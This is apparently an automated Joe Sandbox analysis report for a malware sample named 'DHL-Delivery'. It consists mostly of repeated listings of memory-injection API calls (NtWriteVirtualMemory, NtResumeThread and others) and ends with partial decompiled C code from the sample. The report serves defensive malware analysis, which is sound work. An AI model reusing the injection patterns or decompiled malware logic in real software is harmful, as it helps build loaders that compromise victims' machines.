                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021A9C94,00000040,021A0A1C,00000000,00000000,00000000,00000000,?,00000000,00000000,021A841B), ref: 021AA423
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Control-flow Graph

                        [Control-flow graph for the function at 0x40f274 (decompiled below as E0040F274); the rendered graph is not preserved.]
                        C-Code - Quality: 53%
                        			E0040F274(signed int _a4) {
                        				intOrPtr _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				void* _v36;
                        				intOrPtr _v40;
                        				char _v44;
                        				long long _v52;
                        				char _v60;
                        				intOrPtr _v64;
                        				char _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				char _v84;
                        				char _v88;
                        				char _v92;
                        				signed int _v96;
                        				char _v100;
                        				signed int _v104;
                        				char _v108;
                        				signed int _v116;
                        				char _v124;
                        				char _v132;
                        				char _v140;
                        				intOrPtr _v148;
                        				char _v156;
                        				intOrPtr _v164;
                        				char _v172;
                        				char* _v180;
                        				char _v188;
                        				char _v192;
                        				char _v196;
                        				char _v200;
                        				char _v204;
                        				char _v208;
                        				char _v212;
                        				intOrPtr _v216;
                        				char _v220;
                        				intOrPtr _v224;
                        				char _v228;
                        				signed int _v232;
                        				signed int _v236;
                        				signed int _v240;
                        				signed int _v244;
                        				intOrPtr* _v248;
                        				signed int _v252;
                        				signed int _v256;
                        				signed int _v260;
                        				signed int _v280;
                        				char _v284;
                        				signed int _v288;
                        				void* _v292;
                        				signed int _v296;
                        				signed int _v300;
                        				signed int _v304;
                        				intOrPtr* _v308;
                        				signed int _v312;
                        				intOrPtr* _v316;
                        				signed int _v320;
                        				signed int _v324;
                        				intOrPtr* _v328;
                        				signed int _v332;
                        				intOrPtr* _v336;
                        				signed int _v340;
                        				intOrPtr* _v344;
                        				signed int _v348;
                        				intOrPtr* _v352;
                        				signed int _v356;
                        				char _v360;
                        				signed int _v364;
                        				signed int _v368;
                        				intOrPtr* _v372;
                        				signed int _v376;
                        				intOrPtr* _v380;
                        				signed int _v384;
                        				intOrPtr* _v388;
                        				signed int _v392;
                        				intOrPtr* _v396;
                        				signed int _v400;
                        				intOrPtr* _v404;
                        				signed int _v408;
                        				intOrPtr* _v412;
                        				signed int _v416;
                        				signed int _v420;
                        				intOrPtr* _v424;
                        				signed int _v428;
                        				void* _v432;
                        				signed int _v436;
                        				void* _v440;
                        				signed int _v444;
                        				intOrPtr* _v448;
                        				signed int _v452;
                        				signed int _v456;
                        				intOrPtr _v611;
                        				char* _t601;
                        				char* _t603;
                        				intOrPtr* _t607;
                        				signed int _t611;
                        				signed int _t615;
                        				signed int _t619;
                        				signed int _t623;
                        				signed int _t642;
                        				signed int _t648;
                        				signed int _t652;
                        				signed int _t656;
                        				signed int _t660;
                        				char* _t665;
                        				signed int _t669;
                        				signed int _t673;
                        				signed int _t677;
                        				char* _t680;
                        				signed int _t702;
                        				signed int _t706;
                        				signed int _t714;
                        				signed int _t719;
                        				signed int _t723;
                        				signed int _t728;
                        				signed int _t732;
                        				char* _t736;
                        				signed int _t740;
                        				char* _t746;
                        				signed int _t758;
                        				signed int _t762;
                        				signed int _t766;
                        				signed int _t770;
                        				char* _t774;
                        				signed int _t778;
                        				signed int _t787;
                        				signed int _t796;
                        				signed int _t800;
                        				signed int _t804;
                        				signed int _t808;
                        				char* _t813;
                        				signed int _t817;
                        				signed int _t821;
                        				signed int _t825;
                        				char* _t835;
                        				signed int _t853;
                        				signed int* _t860;
                        				signed int _t864;
                        				char* _t870;
                        				void* _t877;
                        				intOrPtr _t900;
                        				intOrPtr _t903;
                        				signed int* _t915;
                        				char* _t942;
                        				void* _t955;
                        				void* _t964;
                        				intOrPtr _t972;
                        				void* _t973;
                        
                        				 *[fs:0x0] = _t972;
                        				L004011D0();
                        				_v24 = _t972;
                        				_v20 = 0x401108;
                        				_v16 = _a4 & 0x00000001;
                        				_a4 = _a4 & 0xfffffffe;
                        				_v12 = 0;
                        				 *((intOrPtr*)( *_a4 + 4))(_a4, _t955, _t964, _t877,  *[fs:0x0], 0x4011d6);
                        				_v116 = 0x80020004;
                        				_v124 = 0xa;
                        				_push(0);
                        				_push(0xffffffff);
                        				_t601 =  &_v124;
                        				_push(_t601);
                        				_push(0x40e6a8);
                        				_push(0x40e6b0);
                        				L0040131A();
                        				L00401320();
                        				_push(_t601);
                        				_push( &_v140);
                        				L00401326();
                        				_t603 =  &_v140;
                        				_push(_t603);
                        				_push(0x2008);
                        				L0040132C();
                        				_v196 = _t603;
                        				_push( &_v196);
                        				_push( &_v68);
                        				L00401332();
                        				L00401314();
                        				_push( &_v140);
                        				_t607 =  &_v124;
                        				_push(_t607);
                        				_push(2);
                        				L0040130E();
                        				_t973 = _t972 + 0xc;
                        				_push(0);
                        				_push(_v68);
                        				L00401302();
                        				_push( *_t607);
                        				_push(0x40e6a8);
                        				L00401308();
                        				if(_t607 == 0) {
                        					_push( &_v124);
                        					L004012EA();
                        					_push( &_v124);
                        					_t860 =  &_v72;
                        					_push(_t860);
                        					L004012F0();
                        					_push(_t860);
                        					_push( &_v140);
                        					L004012F6();
                        					_push( &_v156);
                        					L004012EA();
                        					_push( &_v140);
                        					_t864 =  &_v156;
                        					_push(_t864);
                        					L004012FC();
                        					_v232 = _t864;
                        					L00401314();
                        					_push( &_v156);
                        					_push( &_v140);
                        					_push( &_v124);
                        					_push(3);
                        					L0040130E();
                        					_t973 = _t973 + 0x10;
                        					if(_v232 != 0) {
                        						_v180 = _a4;
                        						_v188 = 9;
                        						L004012DE();
                        						_t870 =  &_v124;
                        						_push(_t870);
                        						L004012E4();
                        						asm("sbb eax, eax");
                        						_v232 =  ~( ~(_t870 - 0xffff) + 1);
                        						L004012D8();
                        						if(_v232 != 0) {
                        							_v116 = _v116 & 0x00000000;
                        							_v124 = 2;
                        							_push(0xfffffffe);
                        							_push(0xfffffffe);
                        							_push(0xfffffffe);
                        							_push(0xffffffff);
                        							_push( &_v124);
                        							L004012D2();
                        							L00401320();
                        							L004012D8();
                        						}
                        					}
                        				}
                        				if( *0x412010 != 0) {
                        					_v308 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v308 = 0x412010;
                        				}
                        				_t611 =  &_v88;
                        				L004012CC();
                        				_v232 = _t611;
                        				_t615 =  *((intOrPtr*)( *_v232 + 0xa0))(_v232,  &_v72, _t611,  *((intOrPtr*)( *((intOrPtr*)( *_v308)) + 0x304))( *_v308));
                        				asm("fclex");
                        				_v236 = _t615;
                        				if(_v236 >= 0) {
                        					_v312 = _v312 & 0x00000000;
                        				} else {
                        					_push(0xa0);
                        					_push(0x40e6b4);
                        					_push(_v232);
                        					_push(_v236);
                        					L004012C0();
                        					_v312 = _t615;
                        				}
                        				if( *0x412010 != 0) {
                        					_v316 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v316 = 0x412010;
                        				}
                        				_t619 =  &_v92;
                        				L004012CC();
                        				_v240 = _t619;
                        				_t623 =  *((intOrPtr*)( *_v240 + 0x80))(_v240,  &_v196, _t619,  *((intOrPtr*)( *((intOrPtr*)( *_v316)) + 0x30c))( *_v316));
                        				asm("fclex");
                        				_v244 = _t623;
                        				if(_v244 >= 0) {
                        					_v320 = _v320 & 0x00000000;
                        				} else {
                        					_push(0x80);
                        					_push(0x40e6c4);
                        					_push(_v240);
                        					_push(_v244);
                        					L004012C0();
                        					_v320 = _t623;
                        				}
                        				_v208 = _v196;
                        				_v220 = 0xf09e01c0;
                        				_v216 = 0x5afe;
                        				_v280 = _v72;
                        				_v72 = _v72 & 0x00000000;
                        				_v116 = _v280;
                        				_v124 = 8;
                        				_v204 = 0x163da4;
                        				_v200 = 0x440c40;
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
